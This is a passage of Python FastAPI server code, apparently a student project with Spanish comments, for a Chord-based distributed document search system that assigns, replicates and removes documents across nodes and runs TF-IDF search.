documentos desde el ultimo ID de server hasta el propio ID del nuevo server incluyendolo\n for i in range(start,end):\n docs_to_add.append(f\"document_{i}.txt\")\n\n print(f\"docs_to_add en assign_documents = {docs_to_add}, len = {len(docs_to_add)}\")\n # Annade los docs a la BD y calcula el SRI\n add_to_database(datab,name_db, docs_to_add, True) \n\n #text_list = convert_str_to_text_class(PATH_TXTS,docs_to_add)\n ##A cada servidor le toca un archivo.db que se asigna en dependencia de su puerto\n #print(\"DATABASE_DIR \", DATABASE_DIR + \"/\"+ name_db)\n #datab.create_connection(DATABASE_DIR + \"/\"+ name_db) #MODIFICAR CAMBIAR ITERACION\n #for file in text_list:\n # datab.insert_file(file)\n #\n ########## SRI #########\n #vec_mod.doc_terms_data(text_list) # se le pasa la lista de archivos que se le pasa a la base de datos de ese server\n # aqui empieza a calc os tf idf\n # print(vec_mod.doc_terms)\n #######################\n\n node.update_server_files(docs_to_add, [])\n # node.run() #CARLOS\n # print(\"Node Run\")\n # # t1 = threading.Thread(target=node.run)\n # t2 = threading.Thread(target=chord_replication_routine)\n\n # # t1.start()\n # t2.start()\n # print(\"SALIO DEL assign_documents\")\n\n#En la lista de servers_list inicialmente esta vacia y a medida que se conectan en la red los nuevos servers\n# es q se agregan a la lista y se le asignan nuevos documentos.Para esto se tiene en cuenta el ID de los\n# documentos y el ID de los servers.\ndef init_servers(datab, name_db):\n print(\"ENTRO A init_servers\")\n miembros = node.chan.osmembers\n print(f\"GET MEMBERS = {node.get_members()}\")\n n = len(miembros.keys())\n print(\"miembros = \", miembros)\n print(\"n = \", n)\n newserver_id = int(list(miembros.keys())[n - 1])\n \n print(\"newserver_id = \", newserver_id)\n name_db = f'db_{newserver_id}.db'\n print(\"name_db = \", name_db)\n new_members = []\n for m in miembros.items():\n m = (int(m[0]), m[1])\n new_members.append(m)\n print(\"miembros casteados a entero \", new_members)\n new_members = sorted(new_members) #para ordenar los servers por ID\n \n print(\"miembros sorted \", new_members)\n #Actualizo las listas del nuevo nodo\n for i in range(n):\n print(\"key = \", new_members[i][0])\n print(\"int(miembros[i][0]) == newserver_id = \", int(new_members[i][0]) == newserver_id)\n if int(new_members[i][0]) == newserver_id: #Solo entra 1 vez\n start = 1\n if i > 0: start = int(new_members[i - 1][0]) + 1\n print(\"prev id = \", start)\n # Annadir a la BD del nuevo server los docs que le tocan\n assign_documents(start,newserver_id + 1, datab, name_db)\n # Quitar a la BD del sucesor del nuevo server los docs que le tocan al nuevo a traves de un endpoint\n print(\"i <= n - 2 = \", i <= n - 2)\n print(f\"----------i = {i}\")\n print(f\"----------n - 2 = {n -2}\")\n if i <= n - 2:\n rango = f'{start}_{newserver_id + 1}'\n succ_ip = new_members[i + 1][1]['ip']\n succ_port = new_members[i + 1][1]['port']\n print(f\"ENTRO A SUCESOR = {succ_ip}:{succ_port}\")\n server_str = f'http://{succ_ip}:{succ_port}/api/remove_doc/{rango}'\n try:\n requests.delete(server_str, verify=False)\n except:\n print(\"DIO ERROR EN EL init_servers\")\n\n new_id = int(new_members[i][0])\n try:\n # if n == 1:\n new_ip = new_members[i][1].ip\n new_port = new_members[i][1].port\n except:\n new_ip = new_members[i][1]['ip']\n new_port = new_members[i][1]['port']\n\n print(\"new_members[i] = \", new_members[i])\n print(\"new_id = \", new_id)\n print(\"new_ip = \", new_ip)\n print(\"new_port = \", new_port)\n \n 
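# Record the new member's id, ip, and port in three parallel lists kept in join order so later routines (replication, liveness checks) can address every server on the ring.\n        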
servers_ID_list.append(new_id)\n servers_IP_list.append(new_ip) \n ports_list.append(new_port)\n\n print(\"servers_ID_list \", servers_ID_list)\n print(\"servers_IP_list \", servers_IP_list)\n print(\"ports_list \", ports_list)\n\n\n #REPLICAR LOS DOCS DEL PREV \n print(\"Node Run\")\n t2 = threading.Thread(target=chord_replication_routine)\n t2.start()\n\n # coord\n t3 = threading.Thread(target=check_alive)\n t3.start()\n\n print(\"SALIO DEL INIT\")\n\ndef replication_files1(next_id, next_address):\n print(f\"-------ENTRO EN replication_files 1\")\n current_id = node.nodeID\n print_success(f\" current_id = {current_id}\")\n prev_adr = node.chan.get_member(node.get_predecessor())\n print_success(f\"!!!!!!!!!!!!!!!!!!!prev = {prev_adr}\")\n print_success(f\"!!!!!!!!!!!!!!!!!!!succesor = {next_id}, {next_address}\")\n if str(next_id) != str(current_id) or next_address != None:\n ## 1- Actualizar el node.replay del succ del succ, ahora son los nuevos docs. \n ## porque se cambio su node.data y se actualizo\n #print(\"----------------------------------PASO 1\")\n #if current_id < next_id: #Si el nuevo nodo es de mayor ID => no tengo q actualizar el replay del succ del succ\n # # LLamar al succ y q este llame a su succ y actualice su node.replay\n # try:\n # print(\"1-\")\n # url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_succ_data'\n # except:\n # print(\"2-\")\n # url = f'http://{next_address.ip}:{next_address.port}/api/update_succ_data'\n#\n # print(f\"url = {url}\")\n # try:\n # response_data_node_succ = requests.get(url, verify=False)\n # print('Elementos replicados exitosamente')\n # except:\n # print('Error al replicar elementos')\n#\n # 2- Actualizar el node.replay del succ, en vez de ser la data del node prev \n # ahora sera la data del current node.\n print(\"----------------------------------PASO 2\")\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_replay_data'\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data[0] = {current_data}\")\n doc = \"\".join(current_data)\n\n print(f\"url = {url}\")\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n # 3- Actualizar el node.replay del current node, seran los docs de prev node\n print(\"----------------------------------PASO 3\")\n try:\n print(\"1-\")\n url = f'http://{prev_adr[\"ip\"]}:{prev_adr[\"port\"]}/api/get_actual_data'\n except:\n print(\"2-\")\n url = f'http://{prev_adr.ip}:{prev_adr.port}/api/get_actual_data'\n print(f\"url = {url}\")\n # obtener los doc del node preview\n try:\n response_data_prev = requests.get(url, verify=False) \n data_prev = response_data_prev.json()\n print(f\"data_prev = {data_prev}, len = {len(data_prev)}\")\n data_prev_list = list(data_prev[0].values())[0]\n print(f\"data_prev_list = {data_prev_list}, len = {len(data_prev_list)}\")\n node.update_server_files(current_data, data_prev_list)\n add_to_database(database,\"\",data_prev_list, True)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n print(\"COMPROBANDO TODO....\")\n all_data = get_all_data()\n print_success(f\"all_data = {all_data}, len = 
{len(all_data)}\")\n print_success(\"!!!! TERMINO EL replication_files 1!!!!\")\n\n# Se cayo el nodo siguiente a mi\n# next_fallen = True: se cayo el de alante de mi\n# next_fallen = False: se cayo el de atras de mi\ndef replication_files2(next_id, next_address, next_fallen):\n print(f\"-------ENTRO EN replication_files 2\")\n print_success(f\"-----------------next address: {next_id}, {next_address}\")\n current_id = node.nodeID\n print_success(f\" current_id = {current_id}\")\n print_success(f\"------------len(node.get_members()) = {len(node.get_members())}\")\n\n if len(node.get_members()) == 1: #ES el unico nodo que queda\n print(\"SOLO QUEDA 1 NODO EN LA RED\")\n new_data_combined = list(node.data.values())[0]\n print(f\"list(node.data.values())[0] = {new_data_combined}, len = {len(new_data_combined)}\")\n replay_list = list(node.replay.values())[0]\n print(f\"replay_list = {replay_list}, len = {len(replay_list)}\")\n new_data_combined.extend(replay_list)\n print(f\"new_data_combined = {new_data_combined}, len = {len(new_data_combined)}\")\n node.update_server_files(new_data_combined, [])\n elif len(node.get_members()) == 2:\n print(\"HAY 2 NODOS EN LA RED\")\n #Copiar lo del uno en el otro\n # poner elif\n if str(next_id) != str(current_id) or next_address != None:\n if next_fallen:\n print(f\"node.get_members() = {node.get_members()}\")\n print(\"PRIMETA PARTE next_fallen = True\")\n # Llamo a mi sucesor y este tiene que agregar en su node.data los archivos de su node.replay\n # Luego, llama a su sucesor pasandole su nuevo node.data para q lo actualice en su otro node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_succ_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_succ_data'\n\n print(f\"url = {url}\")\n try:\n response_data_node_succ = requests.get(url, verify=False)\n print('Elementos replicados exitosamente en 1ra parte')\n except:\n print('Error al replicar elementos en 1ra parte')\n\n print(\"SEGUNDA PARTE next_fallen = True\")\n # LLAmo a mi sucesor y le paso mis docs de node.data para q los actualice en su node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_all_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_all_data'\n\n print(f\"(((((((((((((( url = {url}\")\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data[0] = {current_data}\")\n doc = \"\".join(current_data)\n\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n print(\"-------------- url de replication files 2 ---------------- \", url)\n try:\n response = requests.get(url, verify=False) #AQUI HUBO ERROR, múltiples intentos de conexión y todos ellos fallaron. 
\n print(\"/////////////////////////, \", response)\n print('Elementos replicados exitosamente en 2da parte')\n except:\n print('Error al replicar elementos en 2da parte')\n else:\n print(f\"node.get_members() = {node.get_members()}\")\n print(\"PRIMETA PARTE next_fallen = False\")\n # Tengo q tomar mis node.data y node.replay y unirlo y llamar a mi sucesor para q lo actualice en \n # su node.replay\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_all_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_all_data'\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_data = list(separated_data[0].values())[0]\n current_replay = list(separated_data[1].values())[0]\n new_current_data = current_data + current_replay\n print(f\"new_current_data = {new_current_data}\")\n node.update_server_files(new_current_data, current_replay)\n\n doc = \"\".join(new_current_data)\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False) #AQUI HUBO ERROR, múltiples intentos de conexión y todos ellos fallaron. \n print(\"////////////////////, \", response)\n print('Elementos replicados exitosamente en 2da parte del next_fallen = False')\n except:\n print('Error al replicar elementos en 2da parte next_fallen = False')\n\n print(\"SEGUNDA PARTE next_fallen = FAlse\")\n # 3- Actualizar el node.replay del current node, seran los docs de prev node\n print(\"----------------------------------PASO 3\")\n prev_adr = node.chan.get_member(node.get_predecessor())\n print_success(f\"!!!!!!!!!!!!!!!!!!!prev en next_fallen = FAlse => {prev_adr}\")\n try:\n print(\"1-\")\n url = f'http://{prev_adr[\"ip\"]}:{prev_adr[\"port\"]}/api/get_actual_data'\n except:\n print(\"2-\")\n url = f'http://{prev_adr.ip}:{prev_adr.port}/api/get_actual_data'\n print(f\"url = {url}\")\n # obtener los doc del node preview\n try:\n response_data_prev = requests.get(url, verify=False) \n data_prev = response_data_prev.json()\n print(f\"data_prev = {data_prev}, len = {len(data_prev)}\")\n data_prev_list = list(data_prev[0].values())[0]\n print(f\"data_prev_list = {data_prev_list}, len = {len(data_prev_list)}\")\n node.update_server_files(current_data, data_prev_list)\n add_to_database(database,\"\",data_prev_list, True)\n print('Elementos replicados exitosamente en next_fallen = FAlse')\n except:\n print('Error al replicar elementos en next_fallen = FAlse')\n\n \n print(\"COMPROBANDO TODO 2 ....\")\n all_data = get_all_data()\n print_success(f\"all_data 2 = {all_data}, len = {len(all_data)}\")\n print_success(\"!!!! 
TERMINO EL replication_files 2!!!!\")\n \n\n@app.get('/api/update_all_data/{doc}')\ndef update_all_data (doc:str):\n print(\"ENTRO AL update_all_data\")\n # node.data = node.data.extend(node.replay) # extend no existe\n print(\"node data *************\", node.data)\n print()\n print(\"node replay *************\", node.replay)\n print()\n #node.data.update(node.replay)\n print(\"node data *************\", node.data)\n print()\n update_replay_data(doc)\n \n\n# Actualiza en el sucesor de mi sucesor el data.replay\n@app.get('/api/update_succ_data')\ndef api_update_succ_data():\n print(\"ENTRO A api_update_succ_data\")\n succ_adr = node.chan.get_member(node.get_succesor())\n new_data = []\n\n separated_data = get_separated_data()\n print(f\"separated_data[0] = {separated_data[0]}\")\n current_data = list(separated_data[0].values())[0]\n print(f\"current_data = {current_data}, len = {len(current_data)}\")\n print()\n\n print(f\"separated_data[1] = {separated_data[1]}\")\n current_replay = list(separated_data[1].values())[0]\n print(f\"current_replay = {current_replay}, len = {len(current_replay)}\")\n\n new_data = current_data + current_replay\n print(f\"new_data combinada = {new_data}, len = {len(new_data)}\")\n node.update_server_files(new_data, current_replay) #DATOS MIOS Y DE MI PREVIEWS Q SE CAYO\n\n # LLamar a mi sucesor para que actualice su node.replay, pq mi node.data cambio\n try:\n print(\"1-\")\n url = f'http://{succ_adr[\"ip\"]}:{succ_adr[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{succ_adr.ip}:{succ_adr.port}/api/update_replay_data'\n\n print(f\"utl = {url}\")\n doc = \"\".join(new_data)\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n print(\"SALIO DEL api_update_succ_data\")\n\n@app.get('/api/update_replay_data/{doc}')\ndef api_update_replay_data(doc:str):\n print(f\"--------------ENTRO EN /api/update_replay_data\")\n return update_replay_data(doc)\n\ndef update_replay_data(doc:str):\n print(f\"--------------ENTRO EN update_replay_data\")\n print(f\"doc = {doc}\")\n #indices = get_indexes_from_str(doc)\n #print(f\"indices = {indices}\")\n #new_replay = []\n #for i in indices:\n # temp = f\"document_{i}.txt\"\n # new_replay.append(temp)\n matches = re.findall(r\"document_(\\d+)\\.txt\", doc)\n new_replay = [f\"document_{int(match)}.txt\" for match in matches]\n print(f\"new_replay = {new_replay}\")\n \n print(f\"node.data antes de hacer sorted = {node.data}\")\n print()\n print(f\"node.replay antes de hacer sorted = {node.replay}\")\n current_data = list(node.data.values())[0]\n #old_replay = list(node.replay.values())[0]\n node.update_server_files(current_data, new_replay)\n # AGREGAR A LA BD los archivos de la nueva replica!\n add_to_database(database,\"\", new_replay, True)\n\n # Borrar los archivos viejos\n #print(\"VAMOS A BORRAR LOS DOCUMENTOS DEL OLD REPLAY\")\n #old_indexes = get_indexes_from_list(old_replay)\n #print(f\"old_indexes = {old_indexes}\")\n #for i in old_indexes:\n # database.remove_file(i)\n new_all_data = get_all_data()\n print(f\"DOCUMENTOS DE LA BASE DE DATOS = {new_all_data}, len = {len(new_all_data)}\")\n print(f\"node.data = {node.data}, node.replay = {node.replay}\")\n\n print_info(\"After update_replay_data restarting pred_data_info\")\n if not len(node.replay.items()) <= 0:\n print_info(\"Inside if...\")\n items = [(id, address) for (id,address) in 
node.replay.items()]\n node.restart_pred_data_info(int(items[0][0]))\n print_info(f\"node.pred_data: {node.pred_data}\")\n print_info(f\"node.pred_data_copied: {node.pred_data_copied}\")\n# def get_prev_adr(prev_id):\n# print(\"-----------ENTRO A get_prev_adr\")\n# print(f\"prev_id = {prev_id}\")\n# miembros = node.get_members()\n# print(f\"miembros = {miembros}\")\n# for n in node.chan.osmembers.items():\n# print(f\"node in osmembers is {n}\")\n# print(f\"n[0] == str(prev_id) = {n[0] == str(prev_id)}\")\n# if n[0] == str(prev_id):\n# result = n[1]\n# print(f\"result = {result}\")\n# return result\n# print(f\"result = {result}\")\n# return result\n\n# @app.get('/api/replication_docs/{doc}')\n# def replication_docs(doc: str):\n# print(f\"--------------ENTRO EN api/replication_docs\")\n# indices = get_indexes(doc)\n# for data in indices:\n# database.insert_file(data)\n# actual_docs = get_all_data()\n# print(f\"actual_docs = {actual_docs}\")\n# node.update_server_files(actual_docs)\n# return True\n\n# @app.delete('/api/delete_prev_doc/{doc}')\n# def delete_prev_doc(doc:str):\n# print(f\"--------------ENTRO EN api/delete_prev_doc\")\n# indices = get_indexes(doc)\n# for i in indices:\n# database.remove_file(i)\n \n# actual_docs = get_all_data()\n# node.update_server_files(actual_docs)\n# print(f\"Documentos eliminados: {indices}\")\n# print(f\"Documentos restantes en la base de datos: {actual_docs}\")\n\n# return {'deleted_docs': indices, 'remaining_docs': list(actual_docs)}\n \ndef get_indexes_from_str(doc:str):\n pattern = r\"document_(\\d+)\\.txt\" \n matches = re.finditer(pattern, doc)\n indices = [int(match.group(1)) for match in matches]\n return indices\n\ndef get_indexes_from_list(doc):\n print(\"ENTRO EN get_indexes_from_list\")\n print(f\"doc = {doc}\")\n print(f\"type(doc) = {type(doc)}\")\n indexes = []\n for d in doc:\n match = re.search(r'\\d+', d)\n if match:\n index = int(match.group())\n indexes.append(index)\n else:\n print(f'No se encontró el indice {d}')\n return indexes\n\n# @app.get('/api/replication/{rango}') # ROXANA\n# def api_replication(rango:str):\n# print(f\"-------------ENTRO EN API REPLICATION\")\n# print(f\"RANGO = {rango}\")\n# new_docs_replicated = []\n# pos = rango.find('_')\n# print(\"pos = \", pos)\n# prev_id = int(rango[:pos])\n# print(\"prev_id = \", prev_id)\n# newserver_id = int(rango[pos + 1:])\n# print(\"newserver_id = \", newserver_id)\n \n# for i in range(prev_id,newserver_id):\n# new_docs_replicated.append(f\"document_{i}.txt\")\n\n# print(f\"new_docs_replicated = {new_docs_replicated}, len = {len(new_docs_replicated)}\")\n# text_list = convert_str_to_text_class(PATH_TXTS,new_docs_replicated)\n\n# for file in text_list:\n# database.insert_file(file)\n \n# check_files = f\"SELECT ID FROM File\"\n# result = database.execute_read_query(check_files)\n# docs_to_add = []\n# for i in result:\n# doc = f\"document_{i[0]}.txt\"\n# docs_to_add.append(doc)\n \n# print(check_files)\n# print(f\"documentos actuales en API REPLICATION = {docs_to_add}, len = {len(docs_to_add)}\")\n# node.update_server_files(docs_to_add)\n\n@app.get('/api/get_actual_data') # ROXANA\ndef api_get_actual_data():\n print(\"----------ENTRO EN api_get_actual_data\")\n return get_separated_data()\n\ndef get_all_data():\n print(f\"-------------ENTRO EN get_all_data\")\n check_files = f\"SELECT ID FROM File\"\n print(check_files)\n result = database.execute_read_query(check_files)\n docs_to_add = []\n for i in result:\n doc = f\"document_{i[0]}.txt\"\n docs_to_add.append(doc)\n \n return 
docs_to_add\n\ndef get_separated_data():\n print(\"----------ENTRO EN get_separated_data\")\n return [node.data, node.replay]\n\nclass File(BaseModel):\n file_name: str\n server_number: int\n content: str\n # paginas:int\n # editorial: Optional[str]\n\nclass Message(BaseModel):\n server_ip: str\n server_port: int\n content: str\n\nclass AddressModel(BaseModel):\n node_id:int\n ip:str\n port:int\n\nclass FilesModel(BaseModel):\n node_id:int\n ip:str\n port:int\n files:List[str] = []\n\n\n@app.on_event(\"startup\") #ROXANA\nasync def startup_event():\n print(f\"La aplicación se está ejecutando...\")\n\n@app.get(\"/\")\ndef index():\n \n my_variable = os.environ.get('CLUSTERS')\n\n if my_variable is not None:\n print(f\"El valor de la variable de entorno MY_VARIABLE es {my_variable}\")\n else:\n print(\"La variable de entorno MY_VARIABLE no está definida.\")\n return {\n \"data\":[\n {\"name\": \"Hello World!\", \"url\":\"https://localhost:3000\"}\n ]\n }\n\n# Cliente\n# @app.get('/files/{id}')\n# def show_file(id: int):\n# return search_file(id)#{\"data\": id}\n\n# Cliente\n@app.get('/files/search/{text}') #ROXANA\ndef show_file(text: str):\n print(\"-------------ENTRO EN SHOW FILE\")\n print_debug(f\"Searching Text... {text}\")\n #buscar en el propio server primero\n response_me = decorate_data(find_in_myself(text))\n print(f\"response_me = {response_me}\")\n response_others = search_by_text(text)#{\"data\": id} #DUDA ESPERAR A RESPUESTA DE CARLOS EN EL GRUPO\n print(f\"response_others = {response_others}\")\n response = unique(response_me, response_others)\n #response_me.extend(response_others)\n print(f\"response_me unido con response_others = {response}\")\n return response\n\ndef unique(response_me, response_others):\n print(\"--------------ENTRO EN UNIQUE\")\n result = copy.copy(response_me)\n\n for elem in response_others:\n print(f\"elem = {elem}\")\n print(f\"elem not in result = {elem not in result}\")\n if elem not in result:\n result.append(elem)\n\n print(f\" result = {result}\")\n return result\n\ndef find_in_myself(text):\n print(\"----------------------ENTRO A find_in_myself\")\n print(\"Hilo en ejecución: {}\".format(threading.current_thread().name))\n matched_documents = match_by_name(text)\n print_success(f\"!!!! find_in_myself !!! matched documents = { matched_documents}\")\n matched_rank = tf_idf(text)\n print_success(f\"!!!! find_in_myself !!! matched rank = {matched_rank}\")\n\n for i in matched_rank:\n if i not in matched_documents:\n matched_documents.append(i)\n\n # matched_documents = matched_documents + matched_rank\n\n # if matched_documents == []:\n # #Calcularel tf_idf #{\"data\": id}\n # return [matched_rank,False] #El booleano: PARA SABER SI LO QUE DEVUELVE EL METODO ES QUE MATCHEO CON NOMBRE O CON EL RANKING\n # else:\n # return [matched_documents, True]\n\n print(\"!!!----find_in_myself---!!!! 
final matched documents \", matched_documents)\n\n #result = decorate_data(matched_documents)\n return matched_documents #[matched_documents, True]\n #return result\n \n# Server\n# Este es el que llama al TF-IDF\n@app.get('/api/files/search/{text}') \ndef search_file_in_db(text: str): #ROXANA\n print(\"----------------------ENTRO A SEARCH FILE IN DB\")\n return find_in_myself(text)\n\n\n@app.post(\"/files\")\ndef add_file(file: File):\n return {\"msg\": f\"File {file.file_name} a\"}\n\n# Chord\n# Chord Variables\nfrom chord.chord import *\nfrom chord.channel import *\n\nchannel: Channel = None\nnode = ChordNode(channel, Address(first_server_address_ip, \n first_server_address_port), \n Address(server, port),\n default_leader_port = DEFAULT_LEADER_PORT,\n LOCAL=local,\n hash_type=hash_type)\nchannel = node.chan\n# Chord endpoints\n@app.post('/chord/receive/{text}')\ndef receive_notification(text: str):\n print(text)\n\n # Finger Table Routine\n # Create Thread for this process\n # Or create an endpoint\n # while True: #-\n\n # TODO: change this line for request from fastapi endpoint\n # Done! message = node.chan.recvFromAny() # Wait for any request #-\n # TODO: change this line for request from fastapi endpoint\n\n # sender = message[0] # Identify the sender #-\n # request = message[1] # And the actual request #-\n # if request[0] != LEAVE: #and self.chan.channel.sismember('node',str(sender)): #-\n # node.addNode(sender) #-\n # if request[0] == STOP: #-\n # break #-\n # if request[0] == LOOKUP_REQ: # A lookup request #-\n # nextID = node.localSuccNode(request[1]) # look up next node #-\n # server = node.chan.sendTo([sender], (LOOKUP_REP, nextID)) # return to sender #-\n # # node.make_request(server)\n # data = {\"server\":server, \"msg\":(LOOKUP_REP, nextID)}\n # requests.post(f\"http://{server.address.ip}:{server.address.port}/\")\n # if not nextID in node.get_members():#node.chan.exists(nextID): #-\n # node.delNode(nextID) #-\n # elif request[0] == JOIN: #-\n # continue #-\n # elif request[0] == LEAVE: #-\n # node.delNode(sender) #-\n # node.recomputeFingerTable() #-\n # print('FT[','%04d'%node.nodeID,']: ',['%04d' % k for k in node.FT]) #- \n\n return text#{\"data\": id}\n\n@app.post(\"/chord/send\")\ndef send_notification_app(message: Message):\n return {\"server\":f\"Server: {message.server}\",\"msg\": f\"msg: {message.content}\"}\n\n# Chord Channel Endpoints\ndef parse_server(message:Message):\n temp = dict(message.server)\n print(temp)\n return temp\n\n@app.post(\"/chord/channel/join\")\ndef send_message(message: Message):\n print(message.server_ip, message.server_port, message.content)\n # parse_server(message)\n nodeID = None\n if node.is_leader:\n nodeID = int(node.chan.join('node', message.server_ip, message.server_port, order=False)) # Find out who you are #-\n node.addNode(nodeID)\n print_debug(\"Inside Join Endpoint: \" + str(nodeID))\n print_info(node.nodeID)\n # node.recomputeFingerTable()\n # return {\"server\":f\"Server: {message.server}\",\"msg\": f\"msg: {message.content}\"}\n return nodeID\n\n@app.get('/chord/channel/info')\ndef get_channel_members():\n return {\"osmembers\":node.chan.osmembers, \"nBits\":node.chan.nBits, \"MAXPROC\":node.chan.MAXPROC, \"address\":node.chan.address }#search_by_text(text)#{\"data\": id}\n\n@app.get('/chord/channel/members')\ndef get_channel_members():\n return {\"osmembers\":node.chan.osmembers, \"nBits\":node.chan.nBits, \"MAXPROC\":node.chan.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Chord Replication Endpoints\n# Si el 
predecesor envia un mensaje para replicarse, el sucesor guarda la informacion del mismo\n@app.get('/chord/succ/{text}')\ndef get_channel(text: str):\n return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Confirmar que ya se replico la informacion en el siguiente nodo\n@app.post('/chord/succ/data/done')\ndef post_data(files: FilesModel):\n print(\"Replication Done!\", files.files)\n return node.confirm_pred_data_info(files.node_id, Address(files.ip, files.port), files.files)#node.check_pred_data(address.node_id, Address(address.ip, address.port))#return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n# Verificar si ya se replico la informacion en el siguiente nodo\n@app.post('/chord/succ/data')\ndef verify_data(address: AddressModel):\n get_all_data()\n return node.check_pred_data(address.node_id, Address(address.ip, address.port))#return {\"osmembers\":channel.osmembers, \"nBits\":channel.nBits, \"MAXPROC\":channel.MAXPROC }#search_by_text(text)#{\"data\": id}\n\n@app.delete('/api/remove_doc/{rango}') # ROXANA\ndef remove_doc_api(rango:str):\n print(\"--------------------ENTRO A REMOVE DOC API\")\n pos = rango.find('_')\n print(\"pos = \", pos)\n prev_id = int(rango[:pos])\n print(\"prev_id = \", prev_id)\n newserver_id = int(rango[pos + 1:])\n print(\"newserver_id = \", newserver_id)\n remove_data = []\n for i in range(prev_id, newserver_id):\n print(\"remove doc = \", i)\n data = f\"document_{i}.txt\"\n remove_data.append(data)\n database.remove_file(i)\n \n new_data_list = []\n print(f\"node.data = {node.data}\")\n current_data = list(node.data.values())[0]\n print(f\"node.nodeID = {node.nodeID}\")\n\n print(f\"current_data en el remove_doc_api = {current_data}\")\n for d in current_data:\n if d not in remove_data:\n new_data_list.append(d)\n\n # ahora vm solamente con los doc que se quedan en el server \n text_list_to_remove = convert_str_to_text_class(PATH_TXTS, remove_data)\n # for text in text_list_to_remove:\n # vec_mod.delete_doc(text.id)\n # vec_mod.doc_terms.clear()\n # vec_mod.doc_terms_data(text_list) \n vec_mod.delete_doc_list(text_list_to_remove) \n \n print(f\"new_data_list = {new_data_list}\")\n print(f\"node.replay = {node.replay}\")\n replay_list = list(node.replay.values())[0]\n node.update_server_files(new_data_list, replay_list)\n\n #ACTUALIZAR el data.replay de mi succ pq mis archivos cambiaron\n print(f\"------------------------Desde el remove_doc_api voy a replicarme en mi sucesor\")\n next_address = node.chan.get_member(node.get_succesor())\n print(f\"next_address = {next_address}\")\n if next_address != None:\n try:\n print(\"1-\")\n url = f'http://{next_address[\"ip\"]}:{next_address[\"port\"]}/api/update_replay_data'\n except:\n print(\"2-\")\n url = f'http://{next_address.ip}:{next_address.port}/api/update_replay_data'\n doc = \"\".join(current_data)\n\n print(f\"url = {url}\")\n url += f'/{doc}'\n print(f\"url with docs = {url}\")\n try:\n response = requests.get(url, verify=False)\n print('Elementos replicados exitosamente')\n except:\n print('Error al replicar elementos')\n\n\n# Leader\n@app.get('/chord/channel/leader')\ndef is_leader():\n return {\"is_leader\":node.is_leader, \"node_id\":node.nodeID}\n\n@app.get('/chord/channel/get_leader')\ndef get_leader():\n leader_ip = None\n leader_port = None\n actual_leader = node.leader\n if actual_leader:\n leader_ip = actual_leader.ip\n leader_port = 
actual_leader.port\n # else:\n # leader_ip = node.node_address.ip\n # leader_port = node.node_address.port\n\n return {\"is_leader\":node.is_leader, \"node_id\":node.nodeID, \"node_address_ip\":node.node_address.ip, \"node_address_port\":node.node_address.port, \"leader_ip\":leader_ip, \"leader_port\":leader_port}\n\n\ndef chord_replication_routine():\n print(\"Started Node Replication Routine\")\n print(\"Timeout: \", TIMEOUT)\n stopped = False\n discover_timeout = 3\n try:\n while not stopped:\n # Actualizar la lista de nodos con el lider\n node.update_succesors()\n # Obtener el sucesor\n next_id, next_address = node.get_succesor(), node.chan.get_member(node.get_succesor())#node.localSuccNode(node.nodeID)\n print(\"Successor\", next_id, next_address)\n # Buscar si el siguiente nodo sigue activo\n # Verificar si ya se replico la informacion al sucesor\n # Al hacer la peticion verifico si sigue activo y ademas si ya se replico la info\n data = {}\n r = None\n if (not next_id == None ) and (not next_address == None):\n next_address = Address.extract_ip_port(next_address)\n data = {\"node_id\":node.nodeID, \"ip\":node.node_address.ip,\"port\": int(node.node_address.port)}\n try:\n r = requests.post(f\"http://{next_address.ip}:{next_address.port}/chord/succ/data\", json=data, timeout=TIMEOUT)\n except Exception as e:\n print(\"Error trying to verify data replication\")\n print(e)\n print(f\"--------R: {r}\")\n # Si no se ha replicado la informacion. Copiala\n if r:\n print(\"----ENTRO EN EL 1er IF\")\n # print(\"Inside Verifying Data Replication\")\n text = bool(r.json())\n # print(text)\n # print(r.text)\n # print(r.content)\n # print(r.json())\n if not text:\n # Si no se ha replicado, replicalo!\n node.make_replication(next_id, next_address)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 1\")\n replication_files1(next_id, next_address)\n # Si el siguiente se cayo, vuelvela a copiar, busca primero el nodo\n else:\n print(\"-----ENTRO EN EL 2DO IF\")\n node.update_succesors()\n node.succ = node.get_succesor()\n if node.succ:\n node.make_replication(next_id, next_address)\n print(\"------------VA A ENTRAR EN REPLICATION FILES 2\")\n replication_files2(next_id, next_address,True)\n # Busca si el de atras ya existe:\n if node.predecessor:\n print(\"-----ENTRO EN EL 